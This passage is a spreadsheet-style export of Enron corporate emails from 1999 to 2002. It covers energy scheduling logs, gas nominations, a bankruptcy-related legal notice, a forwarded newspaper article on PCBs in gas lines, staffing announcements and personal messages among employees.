left me. I have just been so busy with the write on competition for law_x000D_
review. It is finally over thank god. Anyway, I have electronic deposit, so_x000D_
I don't need my check stub. How is everything with your new clerk? I hope_x000D_
all is well with you. Let me know when you are free for lunch so we can all_x000D_
go out (I guess we will drag Debra along j/k). Anyway, I want to say that it_x000D_
was great working with you. Write back soon._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Majed Nachawati</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 11:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/26/01; HourAhead hour: 19;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/26/01; HourAhead hour: 19;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042619.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/26/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: CISO_EPMI_DESERT_x000D_
  ENGY_TYPE: NFRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 00:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cwcass@duke-energy.com', 'cwester@duke-energy.com', 'rcdouglas@duke-energy.com', 'jabretz@duke-energy.com', 'djdobb@duke-energy.com', 'dcrider@duke-energy.com', 'wespeckels@duke-energy.com', 'dcspencer@duke-energy.com', 'mrcherry@duke-energy.com', 'jaurbanek@duke-energy.com', 'dfarmer@enron.com', 'briley@enron.com', 'dfbane@duke-energy.com', 'jclehman@duke-energy.com', 'carlos.j.rodriguez@enron.com', 'sbeemer@duke-energy.com'})</t>
  </si>
  <si>
    <t>Eastrans Nomination effective 1/25/01</t>
  </si>
  <si>
    <t xml:space="preserve">Clarification to below:  Effective 1/25/01!!_x000D_
---------------------- Forwarded by Marta K Henderson/Houston/PEFS/PEC on_x000D_
01/24/2001 08:45 AM ---------------------------_x000D_
_x000D_
_x000D_
Marta K Henderson_x000D_
01/24/2001 08:32 AM_x000D_
_x000D_
To:   Darrel F. Bane/EastTexas/PEFS/PEC@PEC, John A. Bretz/GCS/CEC/PEC@PEC,_x000D_
      Chad W. Cass/GCS/CEC/PEC@PEC, Michael R._x000D_
      Cherry/EastTexas/PEFS/PEC@PEC, William E. Speckels/GCS/CEC/PEC@PEC,_x000D_
      Donna C. Spencer/GCS/CEC/PEC@PEC, Julia A. Urbanek/GCS/CEC/PEC@PEC,_x000D_
      briley@enron.com, dfarmer@enron.com, carlos.j.rodriguez@enron.com,_x000D_
      Connie Wester/EastTexas/PEFS/PEC@PEC, Ronald C._x000D_
      Douglas/GCS/CEC/PEC@PEC, Daniel C Rider/Houston/PEFS/PEC@PEC, John C_x000D_
      Lehman/Field/PEFS/PEC@PEC, Donna J Dobb/Houston/PEFS/PEC@PEC, Sharon_x000D_
      Beemer/Houston/PEFS/PEC@PEC_x000D_
cc:_x000D_
_x000D_
Subject:  Eastrans Nomination effective 1/25/01_x000D_
_x000D_
Please increase deliveries into Eastrans to 25,000 MMBtu/dy effective_x000D_
9/25/01 and continue until further notified._x000D_
_x000D_
The redeliveries will be:_x000D_
_x000D_
7300 MMBtu from Fuels Cotton Valley_x000D_
17,700 MMBtu to PG&amp;E_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Dec 2001 09:05:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Foreign Insolvency Procedures</t>
  </si>
  <si>
    <t>_x000D_
IF YOU ARE A DIRECTOR OR OFFICER OF A NON-US CORPORATION WITHIN THE ENRON GROUP, PLEASE NOTE THE FOLLOWING:  _x000D_
_x000D_
As you are aware, Enron Corp. and some of Enron's subsidiaries have voluntarily filed for Chapter 11 earlier this week.  We are in the process of evaluating the effect of the filing on the company in which you serve as a director or officer. It is possible that the filing may trigger default or cross default provisions under contracts and other instruments to which your company is a party or otherwise subordinated._x000D_
_x000D_
With that respect, we request that you DO NOT TAKE ANY STEPS TO FILE FOR ANY LOCAL INSOLVENCY PROCEDURE UNTIL YOU HAVE NOTIFIED THE ENRON IN-HOUSE ATTORNEY WITH WHOM YOU NORMALLY WORK AND ALSO HAVE SPOKEN TO CHRIS MALLON (christopher.mallon@weil.com) OR MARGARITA COALE (margarita.coale@weil.com)OR RAM BURSHTINE (ram.burshtine@weil.com) AT WEIL, GOTSHAL &amp; MANGES LLP,PHONE NUMBER: +713 546 5000)._x000D_
_x000D_
_x000D_
_x000D_
**********NOTE**********_x000D_
The information contained in this email message is intended only for use of the individual or entity named above.  If the reader of this message is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.  If you have received this communication in error, please immediately notify us by telephone (212-310-8000), and destroy the original message. Thank you.</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 20:08:28 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cormanerb@cs.com'})</t>
  </si>
  <si>
    <t>Fw: Hi</t>
  </si>
  <si>
    <t>_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: KSchier@Market-Bridge.com &lt;KSchier@Market-Bridge.com&gt;_x000D_
To: Corman, Shelley &lt;Shelley.Corman@ENRON.com&gt;_x000D_
Sent: Mon Feb 04 20:58:39 2002_x000D_
Subject: Hi _x000D_
_x000D_
Hi,_x000D_
_x000D_
I just got a really cool software package that is helping me write and_x000D_
learn Kazakh.  I've attached my first letter._x000D_
_x000D_
Lisa and I hope things are going well for you guys._x000D_
_x000D_
We're filling out paperwork and getting things notarized almost every day._x000D_
And we're getting more excited with each passing document._x000D_
_x000D_
How's Alina doing?_x000D_
_x000D_
Please send us some pictures if you have any._x000D_
_x000D_
Love,_x000D_
_x000D_
Kurt and Lisa</t>
  </si>
  <si>
    <t>Sat, 26 Jan 2002 17:37:19 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/26/02; HourAhead hour: 20;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/26/02; HourAhead hour: 20;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002012620.txt</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 00:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'danny.conner@enron.com', 'lauri.allen@enron.com', 'janet.wallis@enron.com', 'jim.schwieger@enron.com', 'gary.lamphier@enron.com', 'carey.metz@enron.com', 'stacey.neuweiler@enron.com', 'eric.bass@enron.com', 'james.mckay@enron.com', 'liz.bellamy@enron.com', 'greg.mcclendon@enron.com', 'daren.farmer@enron.com', 'edward.gottlob@enron.com', 'thomas.martin@enron.com', 'elsa.villarreal@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Laura Harder/Corp/Enron on 11/28/2000 _x000D_
08:47 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Amanda Huble                           11/28/2000 08:46 AM_x000D_
	_x000D_
_x000D_
To: Becky Young/NA/Enron@Enron, Laura Harder/Corp/Enron@Enron, Jessica _x000D_
Presas/Corp/Enron@ENRON, Ina Rangel/HOU/ECT@ECT, Airam Arteaga/HOU/ECT@ECT, _x000D_
Kimberly Brown/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Gas Fundamentals Website Update_x000D_
_x000D_
Please forward to your groups!_x000D_
_x000D_
Thank you, _x000D_
Amanda Huble _x000D_
---------------------- Forwarded by Amanda Huble/NA/Enron on 11/28/2000 08:42 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
David Dronet_x000D_
11/28/2000 08:41 AM_x000D_
To: Amanda Huble/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Gas Fundamentals Website Update_x000D_
_x000D_
Morning,_x000D_
_x000D_
 As some of you may have noticed we have added security to the Gas _x000D_
Fundamentals Website.  _x000D_
If you encounter this screen when accessing http://gasfundy.corp.enron.com _x000D_
_x000D_
_x000D_
_x000D_
simply login with your Windows Domain name and password.  This is the same _x000D_
account you would use to logon to_x000D_
your PC.  If you do not wish to be prompted with this information again, _x000D_
check the "Save this password in your password list" option and_x000D_
you will not encounter this pop up when accessing the website._x000D_
_x000D_
Thank you,_x000D_
_x000D_
David Dronet_x000D_
xt 53482_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffery.fawcett@enron.com', 'jeff.dasovich@enron.com', 'mbaldwin@igservice.com'})</t>
  </si>
  <si>
    <t>RE: CPUC workshop- conference call</t>
  </si>
  <si>
    <t>Sorry I can't make it; I have a conflict.  I suggest you meet without me and _x000D_
I can catch up later._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Fawcett, Jeffery  _x000D_
Sent: Thursday, April 05, 2001 5:55 PM_x000D_
To: Scott, Susan; Dasovich, Jeff; 'mbaldwin@igservice.com'_x000D_
Subject: CPUC workshop- conference call_x000D_
_x000D_
Sorry for the late notice, but is it possible to get together by telephone _x000D_
tomorrow at around 10:00 a.m. CDT to discuss the upcoming CPUC workshop and _x000D_
how TW and Enron should be engaged in that process?  Mark, Jeff, we'll _x000D_
initiate the call here from Houston.</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 09:16:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'a..howard@enron.com', 'david.mitchell@enron.com', 'james.saunders@enron.com'})</t>
  </si>
  <si>
    <t>Make sure they are current._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Tue, 28 Aug 2001 06:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'referrals@referrals.com'})</t>
  </si>
  <si>
    <t>Thank you for your referral</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Kevin HYATT,_x000D_
_x000D_
Thank you for referring gene2222@msn.com for the FINANCIAL REPORTING SR SPEC position at Enron. You can earn up to a maximum of  $2,000 if this individual is hired._x000D_
_x000D_
We have contacted this person by e-mail and assigned a tracking number as follows:_x000D_
_x000D_
Person Referred | Tracking Number_x000D_
gene2222@msn.com | UYP04KTG_x000D_
_x000D_
Please keep this e-mail. To follow the progress of your referral, use the Tracking Number above. To check the status return to the Referral Station (http://home.enron.com/referralstation), click on the Referral Tracking link and follow the easy instructions._x000D_
_x000D_
We also encourage you to visit the Referral Station at any time to refer more friends._x000D_
_x000D_
Some employees are not eligible to earn rewards for referrals and some candidates are ineligible (for example contractors currently working at Enron)._x000D_
_x000D_
If you have any questions about Enron's Referral Station please visit the Referral Station (http://home.enron.com/referralstation) and click on the FAQ link in the footer.  You may also email your questions to referrals@referrals.com._x000D_
_x000D_
_x000D_
Best regards,_x000D_
Enron Recruiting_x000D_
_x000D_
_x000D_
---------------------------------------------------------_x000D_
NOTE: If you are unable to click on a link in this e-mail, copy the URL (including any part that wraps to a second line) and paste it into your browser._x000D_
 </t>
  </si>
  <si>
    <t>Fri, 4 Jan 2002 12:41:20 -0800 (PST)</t>
  </si>
  <si>
    <t>sitara mappings</t>
  </si>
  <si>
    <t>Russ,_x000D_
_x000D_
Can we get a list of the mappings for all sitara locations.  We are modifying our curve files by getting rid of all "internal" curves.  We need to make sure that we don't have anything mapped to those curves and if so make some changes._x000D_
_x000D_
We also need to think about how this change will work with the estate as well.  Will sitara have a separate database for Netco and estate like TAGG will?_x000D_
_x000D_
Kam</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 12:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Edison Mission Marketing &amp; Trading, Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">Kevin,_x000D_
We are working on a way to trick the system into getting it done. Otherwise, restructuring the way credit is done requires a major back-end rewrite. Given that we can only do so much at any one time and the amount of resources we are pouring into restrucuturing limit orders, I can't promise this any time soon unless we can do it within the existing framework. I will keep you posted._x000D_
_x000D_
Andy_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Presto, Kevin  _x000D_
Sent:	Thursday, May 10, 2001 12:07 PM_x000D_
To:	Zipper, Andy_x000D_
Cc:	Kitchen, Louise; Lavorato, John_x000D_
Subject:	Edison Mission Marketing &amp; Trading, Inc._x000D_
_x000D_
We have a # of counterparties whom credit will allow daily trading and/or balance of month trading (with no forward trading).  It would be much more efficient for the trading organization and the counterparties to have functionality within EOL that allowed for better credit screening.   We have moved away from the broker markets, and the current screening mechanism forces us to trade in the broker market with credit limited counterparties._x000D_
_x000D_
I would like to get this changed ASAP, if possible._x000D_
_x000D_
Thanks._x000D_
---------------------- Forwarded by Kevin M Presto/HOU/ECT on 05/10/2001 11:24 AM ---------------------------_x000D_
From:	Edward Sacks/ENRON@enronXgate on 05/10/2001 10:55 AM_x000D_
To:	Kevin M Presto/HOU/ECT@ECT_x000D_
cc:	William S Bradford/ENRON@enronXgate, Tom Moran/ENRON@enronXgate _x000D_
Subject:	Edison Mission Marketing &amp; Trading, Inc._x000D_
_x000D_
Kevin _x000D_
_x000D_
As I mentioned to you, due to some recent success in obtaining additional security, we are extending credit to Edison Mission Marketing &amp; Trading, Inc. to transact on the day ahead and balance of week markets only.  We will not be granting them execution rights on EOL due to the lack of controls/functionality for daily transactions.  EOL, unlike ICE, has tenor function set by months versus number of days.  As a result, in the case of Edison Mission, if we set EOL for one month, Edison would have access to balance of the month plus next month.  It seems to make this work for Edison and perhaps other potential counterparties, it would either require reengineering of the system or possibly coming up with dividing the products to incorporate daily transactions.  If you would like to discuss further, please call._x000D_
_x000D_
Ed_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 11:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hunter-jessica@houston.rr.com', 'kevin.ruscitti@enron.com', 'geoff.storey@enron.com', 'jason.williams@enron.com', 'r_zivic@hotmail.com', 'rjkdstevens@aol.com', 'maryjanesames.tx@netzero.net', 'mcmcsmarty@aol.com'})</t>
  </si>
  <si>
    <t>P&amp;L 1/5</t>
  </si>
  <si>
    <t>Here are the P&amp;L file and positions._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I will be on vacation next week, Kam will be covering for me.  Thanks._x000D_
PL</t>
  </si>
  <si>
    <t>Fri, 12 May 2000 10:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>Re: Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Leslie Reeves/HOU/ECT on 05/12/2000 05:29 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Shari Mao_x000D_
05/12/2000 04:42 PM_x000D_
To: Leslie Reeves/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Presentation  _x000D_
_x000D_
_x000D_
_x000D_
I've changed the Deal Flow Page to include additional headcount and the _x000D_
Support Structure Summary Page to include costs.  Let me know if you need _x000D_
additional changes!_x000D_
_x000D_
Thanks,_x000D_
Shari_x000D_
3-3859_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Jul 1999 04:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EnBW meeting last Friday</t>
  </si>
  <si>
    <t>Having dealt wih Manfred on a number of matters I have to say I am not _x000D_
surprised.  Scott, please get personally involved in selecting a Punder _x000D_
lawyer that will take his place in meetings with customers and regulators.  I _x000D_
don't want to lose control of legal to John T in Germany.  Let's hire a _x000D_
lawyer on the ground if we need to.  Let me know.  Thanks.  Mark</t>
  </si>
  <si>
    <t>Thu, 15 Jun 2000 03:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ggreen2@txu.com', 'cstone1@txu.com', 'kenenglish@txu.com', 'gary.a.hanks@enron.com', 'daren.j.farmer@enron.com', 'ami.chokshi@enron.com', 'timpowell@txu.com', 'earl.tisdale@enron.com'})</t>
  </si>
  <si>
    <t>HPL NOM FOR JUNE 16, 2000</t>
  </si>
  <si>
    <t>(See attached file: hpl0616.xls)_x000D_
_x000D_
 - hpl0616.xls</t>
  </si>
  <si>
    <t>Fri, 17 Mar 2000 05:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michel.nelson@enron.com', 'dave.schafer@enron.com', 'drew.fossum@enron.com', 'steven.harris@enron.com', 'bill.cordes@enron.com'})</t>
  </si>
  <si>
    <t>PCBs -- Barstow Newspaper</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
---------------------- Forwarded by Louis Soldano/ET&amp;S/Enron on 03/17/2000 _x000D_
01:07 PM ---------------------------_x000D_
_x000D_
_x000D_
"Anderson, David W (Law)" &lt;DWA3@pge.com&gt; on 03/17/2000 12:04:56 PM_x000D_
To: "'Louis Soldano'" &lt;Louis_Soldano@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: PCBs -- Barstow Newspaper_x000D_
_x000D_
_x000D_
Lou --_x000D_
_x000D_
&gt; FYI.  In today's Barstow newspaper._x000D_
&gt;_x000D_
Dave Anderson 415-973-6659_x000D_
_x000D_
&gt; ******************************************_x000D_
&gt;_x000D_
&gt; March 17, 2000_x000D_
&gt;_x000D_
&gt; Cancer-causing agent found in High Desert gas lines_x000D_
&gt;_x000D_
&gt; HEALTH: PG&amp;E is at work to clean up situation.  By TERI FIGUEROA Staff_x000D_
&gt; Writer_x000D_
&gt;_x000D_
&gt; BARSTOW -- Pacific Gas and Electric Co. is working to eliminate a_x000D_
&gt; potential cancer-causing agent found in High Desert gas lines._x000D_
&gt;_x000D_
&gt; Because the amount of the chemical compound polychlorinated biphenyls, or_x000D_
&gt; PCBs, is in trace amounts, officials from the Environmental Protection_x000D_
&gt; Agency say no clean-up is required._x000D_
&gt;_x000D_
&gt; When the PCBs were found in small quantities in the High Desert area in_x000D_
&gt; February, the company immediately began to rectify the problem, Jon_x000D_
&gt; Tremayne, news director for PG&amp;E, said._x000D_
&gt;_x000D_
&gt; "We've been doing very aggressive testing," Tremayne said. "As we identify_x000D_
&gt; (affected areas), we will continue to propose and install filter_x000D_
&gt; separators."_x000D_
&gt;_x000D_
&gt; The filter separators catch the PCBs so the company can collect the_x000D_
&gt; chemical for disposal._x000D_
&gt;_x000D_
&gt; Randy Wittorp, spokesperson for the California EPA office, said because_x000D_
&gt; the chemical is contained within the gas lines, it's unlikely there has_x000D_
&gt; been human exposure._x000D_
&gt;_x000D_
&gt; "What we are talking about here is very low levels, well below EPA_x000D_
&gt; levels," Tremayne said._x000D_
&gt;_x000D_
&gt; PCB levels detected in the area range from 2 to 22 parts per million,_x000D_
&gt; Tremayne said, with the majority of PCBs in the range of six to 10 parts_x000D_
&gt; per million._x000D_
&gt;_x000D_
&gt; EPA regulations state the danger levels for PCBs are anything above 50_x000D_
&gt; parts per million, an EPA official said._x000D_
&gt;_x000D_
&gt; "PCBs are authorized for use at concentrations of less than 50 PPMs," said_x000D_
&gt; Max Weintraub, PCB coordinator for the EPA in the California region. "The_x000D_
&gt; federal law really starts at 50 PPM. There's no requirement that they_x000D_
&gt; clean it up."_x000D_
&gt;_x000D_
&gt; Tremayne said an EPA study shows PCBs have been known to cause cancer in_x000D_
&gt; laboratory rats. Information from the EPA shows exposure to the chemical_x000D_
&gt; has been associated with cancer, neurological and reproductive effects._x000D_
&gt;_x000D_
&gt; "You're not going to breath it in, but you will get exposed to it through_x000D_
&gt; skin contact and consumption," Weintraub said._x000D_
&gt;_x000D_
&gt; The material was detected as far away as 20 miles west of Hinkley and down_x000D_
&gt; into Rabbit Springs meter station. The Helendale regulation station has so_x000D_
&gt; far shown no detectable levels of PCBs, he said._x000D_
&gt;_x000D_
&gt; PG&amp;E delivers gas to Southwest Gas Co., who in turn serves 100,000_x000D_
&gt; customers in the High Desert, Southwest Gas spokesman Roger Buehrer said._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Buehrer said his company has been testing for PCBs for about six weeks,_x000D_
&gt; and so far have not detected the chemical in their pipe lines._x000D_
&gt;_x000D_
&gt; "We don't think there is anything to worry about because the levels are so_x000D_
&gt; low," Buehrer said._x000D_
&gt;_x000D_
&gt; Buehrer said the company will continue PCB testing through next week._x000D_
&gt;_x000D_
&gt; The PCBs traveling through the gas lines are in small amounts, said Robert_x000D_
&gt; Doss, site remediation principal in the environmental services division of_x000D_
&gt; PG&amp;E._x000D_
&gt;_x000D_
&gt; "We are not finding them at customer meters," Doss said. "The potential_x000D_
&gt; for them to get to customers is very slim. This was a surprise to us._x000D_
&gt; We've had decades of clean tests."_x000D_
&gt;_x000D_
&gt; Tremayne said the source of the PCB contamination is coming from_x000D_
&gt; Transwestern Pipeline Co. and said the two companies are working closely_x000D_
&gt; to eliminate the chemical._x000D_
&gt;_x000D_
&gt; "It's not a finger-pointing game," he said. "Everybody is working together_x000D_
&gt; to get this thing resolved."_x000D_
&gt;_x000D_
&gt; The company has been working to eliminate the problem, said Dave Schafer,_x000D_
&gt; spokesman for Transwestern Pipeline._x000D_
&gt;_x000D_
&gt; "Our commitment is to get it down to levels that aren't even trace_x000D_
&gt; amounts," Schafer said._x000D_
&gt;_x000D_
&gt; Tremayne said PG&amp;E officials notified the California Public Utilities_x000D_
&gt; Commission of the PCB detection on Tuesday, and the state attorney_x000D_
&gt; general's office last week. PG&amp;E has also notified officials from the_x000D_
&gt; Southwest Gas Co., the local gas utility supplier who takes the feed from_x000D_
&gt; the PG&amp;E gas line and delivers it to customers._x000D_
&gt;_x000D_
&gt; Copyright , 1999 Desert Dispatch. All rights reserved. Material from this_x000D_
&gt; site may not be republished without the expressed, written permission of_x000D_
&gt; the Desert Dispatch._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; _x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 10:23:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>EPE Contacts - PLEASE READ</t>
  </si>
  <si>
    <t xml:space="preserve">Please note - _x000D_
_x000D_
Kathy asked that we update our EPE distribution list. Suggestion - create a personal contact folder in Outlook called "El Paso" that includes the following e-mail addresses:_x000D_
_x000D_
kpeterso@epelectric.com_x000D_
tsoto@epelectric.com_x000D_
sburac1@epelectric.com_x000D_
_x000D_
Please let me know if you need help doing this._x000D_
_x000D_
_x000D_
Kate Symes_x000D_
Real Time Trading Support_x000D_
Office/503-464-7744_x000D_
Cell/503-819-2181_x000D_
Fax/503-464-7996_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 08:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron Wind</t>
  </si>
  <si>
    <t>Effective immediately, Stan Horton, Chairman and Chief Executive Officer of _x000D_
Enron Transportation Services will become Chairman of Enron Wind.  Stan _x000D_
replaces Jim Noles, who is retiring.  _x000D_
_x000D_
Adam Umanoff, currently Managing Director of Enron Wind-Americas, will become _x000D_
President and Chief Executive Officer of Enron Wind. _x000D_
_x000D_
Herbert Peels, currently Vice President of General Manufacturing for Enron _x000D_
Wind, will become Vice President and General Manager for Enron Wind-Europe. _x000D_
_x000D_
Tod Lindholm, currently Managing Director of Enron Assurance Services and _x000D_
Information Technology Compliance, will join Enron Wind as Chief Financial _x000D_
Officer._x000D_
_x000D_
Please join us in wishing Jim well and congratulating Stan on his additional _x000D_
role, as well as, Adam, Herbert and Tod on their new roles.</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 14:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'filuntz@aol.com', 'liz@luntz.com', 'mike.dahlke@enron.com', "nicholas.o'day@enron.com"})</t>
  </si>
  <si>
    <t>CA Power Issues</t>
  </si>
  <si>
    <t xml:space="preserve">- California Gov. Gray Davis on Wednesday signed emergency legislation to cut _x000D_
electricity rates in San Diego where a tripling in customers' bills this _x000D_
summer has sparked a public outcry. _x000D_
_x000D_
_x000D_
Enron Corp. (ENE) executives Wednesday called for swift federal action to _x000D_
reform the U.S. wholesale power market and avert chronic power-supply _x000D_
problems nationally, such as the high-profile woes that plagued the _x000D_
California electricity market this summer. _x000D_
_x000D_
_x000D_
_x000D_
California Utilities Reap Huge Profits Amid Record-High Energy Bills _x000D_
_x000D_
_x000D_
_x000D_
In the seemingly long-ago 1990s, when California had electrons to spare and _x000D_
energy was the last issue on most people's minds, San Diego Gas &amp; Electric _x000D_
tried to expand a 700-megawatt power plant in Chula Vista--and met with stony _x000D_
indifference from local government types. _x000D_
The attitude bespoke the not-in-my-backyard opposition that such projects _x000D_
typically have faced around the state. SDG&amp;E shelved the plan. _x000D_
But the current is flowing the other way now: The state is in the midst of an _x000D_
electricity crisis, and the San Diego bedroom community is urging the plant's _x000D_
new operator not just to keep the facility running but, indeed, to make it _x000D_
bigger. _x000D_
</t>
  </si>
  <si>
    <t>Mon, 3 Apr 2000 10:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Japanese Labor Law Memorandum</t>
  </si>
  <si>
    <t xml:space="preserve">Twanda, please save under Japanese labor law memo and print for me.  Thanks.  _x000D_
Michelle_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 04/03/2000 05:56 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Nony Flores_x000D_
03/24/2000 11:56 AM_x000D_
To: Michael Gantt/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Michelle _x000D_
Cash/HOU/ECT@ECT_x000D_
cc: Alan Aronowitz/HOU/ECT@ECT _x000D_
Subject: Japanese Labor Law Memorandum_x000D_
_x000D_
As per Alan's request, attached is the Baker &amp; McKenzie memorandum dated _x000D_
April 1999, which provides an overview of the principal labor rules and _x000D_
standards required by Japanese law._x000D_
_x000D_
Thanks._x000D_
Nony Flores_x000D_
_x000D_
  _x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 07:44:23 -0800 (PST)</t>
  </si>
  <si>
    <t>What... no comment on the Steelers Statistics......_x000D_
_x000D_
Anyhow, OK if you have a meeting... I'll just stay at Alex's Halloween party_x000D_
for a little while longer, if you're meeting ends really early you should_x000D_
walk down to his school, otherwise we'll just look for you at the normal_x000D_
place..._x000D_
-----Original Message-----_x000D_
From: Joe.Quenet@enron.com [mailto:Joe.Quenet@enron.com]_x000D_
Sent: Monday, October 29, 2001 9:31 AM_x000D_
To: Quenet, Rebecca_x000D_
Subject: RE: Reminder_x000D_
_x000D_
_x000D_
i just found out that we have a meeting tonite from 4-5 pm .....thats all i_x000D_
know for now.    could be over at 4:30  or 5 :15._x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   "Quenet, Rebecca" &lt;rebecca.quenet@eds.com&gt;@ENRON_x000D_
   Sent:   Monday, October 29, 2001 8:48 AM_x000D_
   To:     Quenet, Joe_x000D_
   Subject:  RE: Reminder_x000D_
_x000D_
   Ahhh you foolish, foolish little man.  Not only are you going against_x000D_
   your_x000D_
   wife's team.... but you are going against the statistics... that the_x000D_
   Steelers have always won on Monday Night Football over the past 5_x000D_
   years...._x000D_
_x000D_
   May you crash and burn......._x000D_
_x000D_
   -----Original Message-----_x000D_
   From: Joe.Quenet@enron.com [mailto:Joe.Quenet@enron.com]_x000D_
   Sent: Monday, October 29, 2001 8:34 AM_x000D_
   To: rebecca.quenet@eds.com_x000D_
   Subject: RE: Reminder_x000D_
_x000D_
_x000D_
   ok......_x000D_
_x000D_
      by the way, i'm in the running for the weekly football pool here_x000D_
   $102_x000D_
   in the pot.    turns out benson has the steelers, i took the titans with_x000D_
   someone else. when....not if the titans win and the total pts are over_x000D_
   48 i_x000D_
   win............._x000D_
       -----Original Message-----_x000D_
      From:   "Quenet, Rebecca" &lt;rebecca.quenet@eds.com&gt;@ENRON_x000D_
      Sent:   Monday, October 29, 2001 8:23 AM_x000D_
      To:     Quenet, Joe_x000D_
      Subject:  Reminder_x000D_
_x000D_
      Hey,_x000D_
_x000D_
      Don't forget to call your benefits group regarding the $$$ that you_x000D_
   have_x000D_
      placed in there.  Also don't forget to call Beta and see what the_x000D_
   deal_x000D_
      is...._x000D_
_x000D_
      I'll be at Alex's school from 4:00 - 4:20 or so, so I'll pick you up_x000D_
   at_x000D_
      4:30.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t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 10:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'amitava.dhar@enron.com', 'vasant.shanbhogue@enron.com', 'vince.kaminski@enron.com', 'iris.mack@enron.com'})</t>
  </si>
  <si>
    <t>Having Iris visit London</t>
  </si>
  <si>
    <t xml:space="preserve">It's OK to delay the materials for Duffie. He is very busy anyway and is not _x000D_
going to complain._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/24/2001 _x000D_
05:23 PM ---------------------------_x000D_
_x000D_
_x000D_
Scott Salmon@ENRON_x000D_
04/24/2001 01:23 PM_x000D_
To: Amitava Dhar/Corp/Enron@ENRON_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Vasant Shanbhogue/Enron@EnronXGate, Ben _x000D_
Parsons/LON/ECT@ECT, George Albanis/LON/ECT@ECT, Tomas Valnek/LON/ECT@ECT, _x000D_
